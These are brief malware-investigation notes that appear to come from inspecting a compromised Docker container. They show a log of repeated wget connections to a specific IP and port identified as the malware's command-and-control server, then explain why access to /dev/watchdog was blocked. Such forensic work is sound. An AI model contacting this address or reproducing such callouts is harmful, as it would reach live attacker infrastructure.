Upon directly exec'ing into the Docker process, we got:

Connecting to 38.247.134.212:3778... connected.
HTTP request sent, awaiting response... --2026-03-25 16:16:40--  http://38.247.134.212:3778/
Connecting to 38.247.134.212:3778... connected.
HTTP request sent, awaiting response... cancel failed: Operation timed out.
cancel failed: Operation timed out.
--2026-03-25 16:16:50--  http://38.247.134.212:3778/
Connecting to 38.247.134.212:3778... connected

This means that the malware's C2 server is still active and running, but connection timed out - key to note


Reason why watchdog was denied but not logged:
(1)Device cgroup restrictions: Docker blocks access to /dev/watchdog before AA even sees it
(2)DAC file permissions are owned by root. Docker is not root, therefore Docker denies it before AA sees it
(3)The kernel itself blocks watchdog
